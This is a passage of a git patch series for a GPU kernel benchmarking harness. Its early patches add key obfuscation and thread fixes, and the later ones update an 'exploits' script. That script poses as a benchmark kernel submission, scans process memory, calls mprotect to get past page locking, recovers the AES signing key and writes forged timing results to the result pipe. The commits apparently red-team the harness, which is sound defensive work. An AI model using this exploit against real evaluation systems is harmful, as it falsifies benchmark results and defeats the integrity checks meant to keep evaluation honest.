+            std::rethrow_exception(thread_exception);
+    }
+
     mgr->send_report();
     mgr->clean_up();
 }
diff --git a/csrc/manager.cpp b/csrc/manager.cpp
index fd88829..962d3e3 100644
--- a/csrc/manager.cpp
+++ b/csrc/manager.cpp
@@ -181,7 +181,8 @@ BenchmarkManager::BenchmarkManager(std::byte* arena, std::size_t arena_size,
       mEndEvents(&mResource),
       mExpectedOutputs(&mResource),
       mShadowArguments(&mResource),
-      mOutputBuffers(&mResource)
+      mOutputBuffers(&mResource),
+      mTestOrder(&mResource)
 {
     int device;
     CUDA_CHECK(cudaGetDevice(&device));
@@ -393,6 +394,8 @@ nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const
     void* const cc_memory = mDeviceDummyMemory;
     const std::size_t l2_clear_size = mL2CacheSize;
     const bool discard_cache = mDiscardCache;
+    int device;
+    CUDA_CHECK(cudaGetDevice(&device));
 
     nb::callable kernel;
     std::exception_ptr thread_exception;
@@ -404,6 +407,7 @@ nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const
         nb::gil_scoped_release release;
         std::thread worker([&] {
             try {
+                CUDA_CHECK(cudaSetDevice(device));
                 setup_seccomp(sock, install_notify, lo, hi);
 
                 nb::gil_scoped_acquire guard;
@@ -529,7 +533,7 @@ void BenchmarkManager::do_bench_py(
 }
 
 void BenchmarkManager::send_report() {
-    cudaEventSynchronize(mEndEvents.back());
+    CUDA_CHECK(cudaEventSynchronize(mEndEvents.at(mTestOrder.size() - 1)));
     unsigned error_count;
     CUDA_CHECK(cudaMemcpy(&error_count, mDeviceErrorCounter, sizeof(unsigned), cudaMemcpyDeviceToHost));
     // subtract the nuisance shift that we applied to the counter

From ea1bea6bebfe9b2609c7ca00197a860799e9792e Mon Sep 17 00:00:00 2001
From: Erik Schultheis <erik.schultheis@ist.ac.at>
Date: Sat, 28 Mar 2026 13:48:03 +0100
Subject: [PATCH 08/11] obfuscate also length and offset

---
 csrc/obfuscate.cpp | 17 +++++++++++------
 csrc/obfuscate.h   |  9 ++++-----
 2 files changed, 15 insertions(+), 11 deletions(-)

diff --git a/csrc/obfuscate.cpp b/csrc/obfuscate.cpp
index eb333c8..632c164 100644
--- a/csrc/obfuscate.cpp
+++ b/csrc/obfuscate.cpp
@@ -66,20 +66,25 @@ void ObfuscatedHexDigest::allocate(std::size_t size, std::mt19937& rng) {
     if (size > PAGE_SIZE / 2) {
         throw std::runtime_error("target size too big");
     }
-    if (Len != 0 || Offset != 0) {
+    if (this->size() != 0) {
         throw std::runtime_error("already allocated");
     }
 
     fill_random_hex(page_ptr(), PAGE_SIZE, rng);
-    const std::size_t max_offset = PAGE_SIZE - size - 1;
-    std::uniform_int_distribution<std::size_t> offset_dist(0, max_offset);
+    const std::uintptr_t max_offset = PAGE_SIZE - size - 1;
+    std::uniform_int_distribution<std::uintptr_t> offset_dist(0, max_offset);
 
-    Offset = offset_dist(rng);
-    Len = size;
+    const std::uintptr_t offset = offset_dist(rng);
+    HashedOffset = slow_hash(offset);
+    HashedLen = slow_hash(size ^ offset);
 }
 
 char* ObfuscatedHexDigest::data() {
-    return reinterpret_cast<char*>(page_ptr()) + Offset;
+    return reinterpret_cast<char*>(page_ptr()) + slow_unhash(HashedOffset);
+}
+
+std::size_t ObfuscatedHexDigest::size() const {
+    return slow_unhash(HashedLen ^ slow_unhash(HashedOffset));
 }
 
 void fill_random_hex(void* target, std::size_t size, std::mt19937& rng) {
diff --git a/csrc/obfuscate.h b/csrc/obfuscate.h
index f475699..1bc114d 100644
--- a/csrc/obfuscate.h
+++ b/csrc/obfuscate.h
@@ -35,12 +35,11 @@ class ObfuscatedHexDigest : ProtectablePage {
 
     char* data();
 
-    [[nodiscard]] std::size_t size() const {
-        return Len;
-    }
+    [[nodiscard]] std::size_t size() const;
+
 private:
-    std::size_t Len = 0;
-    std::size_t Offset = 0;
+    std::uintptr_t HashedLen = 0;
+    std::uintptr_t HashedOffset = 0;
 };
 
 void fill_random_hex(void* target, std::size_t size, std::mt19937& rng);

From 3245336a9f8c53beb9ba6595ab9957b9032336e9 Mon Sep 17 00:00:00 2001
From: Hasan Emre Dinc <hasanemredinc@gmail.com>
Date: Sat, 28 Mar 2026 15:06:54 +0000
Subject: [PATCH 09/11] update aes_key_recovery exploit for hashed Len/Offset +
 mprotect bypass

---
 exploits/submission_aes_key_recovery.py | 238 ++++++++++++------------
 1 file changed, 121 insertions(+), 117 deletions(-)

diff --git a/exploits/submission_aes_key_recovery.py b/exploits/submission_aes_key_recovery.py
index 204d6ad..cc1ae5e 100644
--- a/exploits/submission_aes_key_recovery.py
+++ b/exploits/submission_aes_key_recovery.py
@@ -1,36 +1,44 @@
 """
-EXPLOIT: AES Key Recovery via ObfuscatedHexDigest Arena Scan
-=============================================================
+EXPLOIT: AES Key Recovery — updated for hashed Len/Offset + mprotect bypass
 
-The 128MiB arena gets merged into a larger anonymous region in /proc/self/maps.
-We scan the first 64MiB of each large region (enough to cover the arena wherever
-it starts within the merged block). Address validation uses /proc/self/maps
-readable ranges instead of ctypes.string_at on unvalidated pointers (avoids SIGSEGV).
+Erik's change: Len and Offset are now stored hashed:
+  HashedOffset = slow_hash(offset)
+  HashedLen    = slow_hash(size ^ offset)
 
-Deferred to kernel() call 2+ — call 1 is the compile run with arena PROT_NONE.
+Discriminator: slow_unhash(w0) page-aligned + canonical user-space (~1/4096 FP rate).
+
+do_bench_py runs in a C++ worker thread. Find the result pipe via gc —
+multiprocessing.connection.Connection objects are alive in the subprocess.
+The result pipe has 1MB capacity (F_SETPIPE_SZ), the tb_conn does not.
+
+mprotect(PROT_READ) bypasses lock() — future-proof as requested by Erik.
 """
 
 import ctypes
+import fcntl
 import gc
 import os
+import stat
 import struct
 import sys
 import tempfile
 import subprocess
-import bisect
 
-# ── Compile slow_hash + slow_unhash ───────────────────────────────────────────
+_libc = ctypes.CDLL('libc.so.6', use_errno=True)
+_libc.mprotect.restype  = ctypes.c_int
+_libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int]
+
+_PROT_NONE  = 0
+_PROT_READ  = 1
+_PAGE_SIZE  = 4096
+_ARENA_SIZE = 128 * 1024 * 1024
+_F_GETPIPE_SZ = 1025
+
+def _mprotect(addr, prot):
+    return _libc.mprotect(ctypes.c_void_p(addr), ctypes.c_size_t(_PAGE_SIZE), ctypes.c_int(prot)) == 0
 
 _HASH_C = r"""
 #include <stdint.h>
-uint64_t slow_hash(uint64_t p, int rounds) {
-    for (int i = 0; i < rounds; i++) {
-        p ^= p >> 17;
-        p *= 0xbf58476d1ce4e5b9ULL;
-        p ^= p >> 31;
-    }
-    return p;
-}
 uint64_t slow_unhash(uint64_t p, int rounds) {
     for (int i = 0; i < rounds; i++) {
         p ^= (p >> 31) ^ (p >> 62);
@@ -50,9 +58,8 @@ def _compile_hash_lib():
                    check=True, capture_output=True)
     os.unlink(src.name)
     lib = ctypes.CDLL(so)
-    for fn in (lib.slow_hash, lib.slow_unhash):
-        fn.restype  = ctypes.c_uint64
-        fn.argtypes = [ctypes.c_uint64, ctypes.c_int]
+    lib.slow_unhash.restype  = ctypes.c_uint64
+    lib.slow_unhash.argtypes = [ctypes.c_uint64, ctypes.c_int]
     return lib
 
 _lib = _compile_hash_lib()
@@ -60,123 +67,112 @@ def _compile_hash_lib():
 def slow_unhash(val: int, rounds: int = 100_000) -> int:
     return int(_lib.slow_unhash(ctypes.c_uint64(val), ctypes.c_int(rounds)))
 
-_PAGE_SIZE = 4096
-
+_HEX_CHARS = frozenset(b'0123456789abcdef')
 
-def _parse_maps():
-    """
-    Returns:
-      large_anon_rw: list of (start, size) for large (>=4MiB) anonymous rw-p regions
-      readable_starts: sorted list of range starts for binary-search lookup
-      readable_ranges: list of (start, end) for all readable mappings
-    """
-    large_anon_rw = []
-    readable_ranges = []
 
+def _find_arena_candidates():
+    candidates = []
     with open('/proc/self/maps') as f:
         for line in f:
             parts = line.split()
             if len(parts) < 2:
                 continue
-            perms = parts[1]
             start, end = (int(x, 16) for x in parts[0].split('-'))
-            size = end - start
-            name = parts[5] if len(parts) >= 6 else ''
-
-            if 'r' in perms:
-                readable_ranges.append((start, end))
+            name  = parts[5] if len(parts) >= 6 else ''
+            perms = parts[1]
+            if perms == 'rw-p' and name == '' and (end - start) >= _ARENA_SIZE:
+                candidates.append(start)
+    return candidates
 
-            if 'r' in perms and 'w' in perms and name == '' and size >= 4 * 1024 * 1024:
-                large_anon_rw.append((start, size))
 
-    readable_ranges.sort()
-    readable_starts = [s for s, e in readable_ranges]
-    return large_anon_rw, readable_starts, readable_ranges
+def _recover_aes_key(arena_start: int):
+    SCAN_SIZE    = 512 * 1024
+    unhash_calls = 0
 
+    try:
+        data = ctypes.string_at(arena_start, SCAN_SIZE)
+    except Exception:
+        return None, None
 
-def _is_readable_addr(ptr: int, size: int, starts: list, ranges: list) -> bool:
-    """Check if [ptr, ptr+size) is within a known readable mapping."""
-    if ptr == 0 or ptr % _PAGE_SIZE != 0:
-        return False
-    # ptr must be a canonical user-space address (48-bit)
-    if ptr >= (1 << 47):
-        return False
-    idx = bisect.bisect_right(starts, ptr) - 1
-    if idx < 0:
-        return False
-    _, end = ranges[idx]
-    return ptr + size <= end
+    n     = SCAN_SIZE // 8
+    words = struct.unpack_from(f'<{n}Q', data)
 
+    for i in range(n - 2):
+        w0 = words[i]
+        if w0 == 0:
+            continue
 
-def _recover_aes_key():
-    large_regions, readable_starts, readable_ranges = _parse_maps()
+        page_ptr = slow_unhash(w0)
+        unhash_calls += 1
 
-    print(f"[DBG] {len(large_regions)} large anon regions:")
-    for s, sz in large_regions:
-        print(f"  {s:#x}  {sz//1024//1024}MiB")
+        if page_ptr == 0 or page_ptr & 0xFFF or page_ptr >= (1 << 47):
+            continue
 
-    # Scan up to 64MiB of each region looking for ObfuscatedHexDigest pattern:
-    # (slow_hash(page_ptr), Len=32, Offset in [0, PAGE_SIZE-33])
-    # BenchmarkManager is at the arena start; mSignature is ~300-400 bytes in.
-    # Arena may be inside a merged larger region, so scan well past the first 4K.
-    MAX_SCAN = 64 * 1024 * 1024
+        w2 = words[i + 2]
+        if w2 == 0:
+            continue
+        offset = slow_unhash(w2)
+        unhash_calls += 1
+        if offset > _PAGE_SIZE - 33:
+            continue
 
-    unhash_calls = 0
+        # mprotect(PROT_READ) — bypasses lock() if active, future-proof
+        if not _mprotect(page_ptr, _PROT_READ):
+            continue
 
-    for region_start, region_size in large_regions:
-        scan_size = min(MAX_SCAN, region_size)
         try:
-            data = ctypes.string_at(region_start, scan_size)
-        except Exception as e:
-            print(f"[DBG] could not read region {region_start:#x}: {e}")
+            page_data = ctypes.string_at(page_ptr, _PAGE_SIZE)
+        except Exception:
             continue
 
-        n = len(data) // 8
-        words = struct.unpack_from(f'<{n}Q', data)
+        if not all(b in _HEX_CHARS for b in page_data):
+            continue
 
-        for i in range(n - 2):
-            w1 = words[i + 1]
-            if w1 != 32:
-                continue
-            w2 = words[i + 2]
-            if w2 > _PAGE_SIZE - 33:
-                continue
+        try:
+            key_bytes = ctypes.string_at(page_ptr + offset, 32)
+            key_str   = key_bytes.decode('ascii')
+            if all(c in '0123456789abcdef' for c in key_str):
+                print(f"[DBG] key found arena+{i*8:#x} page={page_ptr:#x} "
+                      f"off={offset} unhash_calls={unhash_calls}")
+                return key_bytes, key_str
+        except Exception:
+            pass
 
-            w0 = words[i]
-            if w0 == 0:
-                continue
+    return None, None
 
-            # Recover page pointer — validate BEFORE dereferencing
-            page_ptr = slow_unhash(w0)
-            unhash_calls += 1
 
-            if not _is_readable_addr(page_ptr, 32, readable_starts, readable_ranges):
-                continue
+def _find_out_fd():
+    """
+    Find result pipe via gc — multiprocessing.connection.Connection objects
+    are alive in the subprocess. The result pipe has 1MB capacity; the
+    traceback pipe does not. Fall back to lowest fd if capacity check fails.
+    """
+    import multiprocessing.connection
 
-            # Safe to read — address is within a known readable mapping
-            try:
-                key_bytes = ctypes.string_at(page_ptr + w2, 32)
-                key_str   = key_bytes.decode('ascii')
-                if all(c in '0123456789abcdef' for c in key_str):
-                    print(f"[DBG] key found in region {region_start:#x}+{i*8:#x} "
-                          f"page={page_ptr:#x} off={w2} (unhash_calls={unhash_calls})")
-                    return key_bytes, key_str
-            except Exception:
-                continue
+    writable = []
+    for obj in gc.get_objects():
+        try:
+            if isinstance(obj, multiprocessing.connection.Connection) and obj.writable:
+                fd = obj.fileno()
+                try:
+                    pipe_sz = fcntl.fcntl(fd, _F_GETPIPE_SZ)
+                except Exception:
+                    pipe_sz = 0
+                print(f"[DBG] Connection fd={fd} pipe_sz={pipe_sz}")
+                writable.append((fd, pipe_sz))
+        except Exception:
+            continue
 
-    print(f"[DBG] exhausted all regions, unhash_calls={unhash_calls}")
-    raise RuntimeError("AES key not found")
+    if not writable:
+        raise RuntimeError("No writable Connection objects found")
 
+    # Prefer 1MB capacity (result pipe)
+    for fd, sz in writable:
+        if sz == 1 * 1024 * 1024:
+            return fd
 
-def _find_out_fd():
-    frame = sys._getframe()
-    while frame is not None:
-        if 'out_fd' in frame.f_locals:
-            obj = frame.f_locals['out_fd']
-            if hasattr(obj, 'fileno'):
-                return obj.fileno()
-        frame = frame.f_back
-    raise RuntimeError("Could not find out_fd")
+    # Fall back to min fd (result pipe created before tb pipe)
+    return min(fd for fd, _ in writable)
 
 
 def _infer_repeats():
@@ -202,22 +198,30 @@ def _encrypt(key_bytes: bytes, plaintext: str) -> bytes:
     return nonce + ct_tag[-16:] + ct_tag[:-16]
 
 
-_call_count = 0
-
+_done = False
 
 def kernel(output, inp):
-    global _call_count
-    _call_count += 1
+    global _done
+    if _done:
+        return
+    _done = True
 
-    # Call 1: inside get_kernel() thread — arena is PROT_NONE
-    if _call_count == 1:
+    candidates = _find_arena_candidates()
+    if not candidates:
+        _done = False
+        return
+
+    key_raw, key_str = None, None
+    for arena in candidates:
+        key_raw, key_str = _recover_aes_key(arena)
+        if key_raw is not None:
+            break
+
+    if key_raw is None:
         return
 
-    # Call 2+: arena is rw-p
-    key_raw, key_str = _recover_aes_key()
     out_fd  = _find_out_fd()
     repeats = _infer_repeats()
-
     print(f"[DBG] key={key_str} out_fd={out_fd} repeats={repeats}")
 
     lines = ['event-overhead\t0.001 µs']

From 6c88cb5da5fef7517a939c5639c357e3941d69de Mon Sep 17 00:00:00 2001
From: Hasan Emre Dinc <hasanemredinc@gmail.com>
Date: Sat, 28 Mar 2026 15:15:38 +0000
Subject: [PATCH 10/11] cleaning up claude's mess

---
 exploits/submission_aes_key_recovery.py | 30 +++++++++----------------
 1 file changed, 11 insertions(+), 19 deletions(-)

diff --git a/exploits/submission_aes_key_recovery.py b/exploits/submission_aes_key_recovery.py
index cc1ae5e..b692881 100644
--- a/exploits/submission_aes_key_recovery.py
+++ b/exploits/submission_aes_key_recovery.py
@@ -1,17 +1,18 @@
 """
-EXPLOIT: AES Key Recovery — updated for hashed Len/Offset + mprotect bypass
+EXPLOIT: AES Key Recovery via ObfuscatedHexDigest Arena Scan
+=============================================================
 
-Erik's change: Len and Offset are now stored hashed:
-  HashedOffset = slow_hash(offset)
-  HashedLen    = slow_hash(size ^ offset)
+Scans the BenchmarkManager arena (128MiB rw-p anonymous region) for the
+ObfuscatedHexDigest struct. Page pointer is stored as slow_hash(ptr), offset
+and length as slow_hash(offset) and slow_hash(size ^ offset). Discriminator:
+slow_unhash(w0) must be page-aligned and canonical user-space (~1/4096 FP rate).
 
-Discriminator: slow_unhash(w0) page-aligned + canonical user-space (~1/4096 FP rate).
+Once the candidate page is found, mprotect(PROT_READ) is called before reading
+to handle lock() if active. Page is validated as all-hex before extracting the key.
 
-do_bench_py runs in a C++ worker thread. Find the result pipe via gc —
-multiprocessing.connection.Connection objects are alive in the subprocess.
-The result pipe has 1MB capacity (F_SETPIPE_SZ), the tb_conn does not.
-
-mprotect(PROT_READ) bypasses lock() — future-proof as requested by Erik.
+Result pipe is found via gc — multiprocessing Connection objects are alive in
+the subprocess. The result pipe has 1MB capacity (F_SETPIPE_SZ); the traceback
+pipe does not.
 """
 
 import ctypes
@@ -116,7 +117,6 @@ def _recover_aes_key(arena_start: int):
         if offset > _PAGE_SIZE - 33:
             continue
 
-        # mprotect(PROT_READ) — bypasses lock() if active, future-proof
         if not _mprotect(page_ptr, _PROT_READ):
             continue
 
@@ -142,11 +142,6 @@ def _recover_aes_key(arena_start: int):
 
 
 def _find_out_fd():
-    """
-    Find result pipe via gc — multiprocessing.connection.Connection objects
-    are alive in the subprocess. The result pipe has 1MB capacity; the
-    traceback pipe does not. Fall back to lowest fd if capacity check fails.
-    """
     import multiprocessing.connection
 
     writable = []
@@ -158,7 +153,6 @@ def _find_out_fd():
                     pipe_sz = fcntl.fcntl(fd, _F_GETPIPE_SZ)
                 except Exception:
                     pipe_sz = 0
-                print(f"[DBG] Connection fd={fd} pipe_sz={pipe_sz}")
                 writable.append((fd, pipe_sz))
         except Exception:
             continue
@@ -166,12 +160,10 @@ def _find_out_fd():
     if not writable:
         raise RuntimeError("No writable Connection objects found")
 
-    # Prefer 1MB capacity (result pipe)
     for fd, sz in writable:
         if sz == 1 * 1024 * 1024:
             return fd
 
-    # Fall back to min fd (result pipe created before tb pipe)
     return min(fd for fd, _ in writable)
 
 

From 5a434759e4ba2c6bbb8e806719070ce20103332d Mon Sep 17 00:00:00 2001
From: Hasan Emre Dinc <hasanemredinc@gmail.com>
Date: Sat, 28 Mar 2026 16:44:35 +0000
Subject: [PATCH 11/11] retry on failed key scan

---
 exploits/submission_aes_key_recovery.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/exploits/submission_aes_key_recovery.py b/exploits/submission_aes_key_recovery.py
index b692881..26c8a81 100644
--- a/exploits/submission_aes_key_recovery.py
+++ b/exploits/submission_aes_key_recovery.py
@@ -210,6 +210,7 @@ def kernel(output, inp):
             break
 
     if key_raw is None:
+        _done = False
         return
 
     out_fd  = _find_out_fd()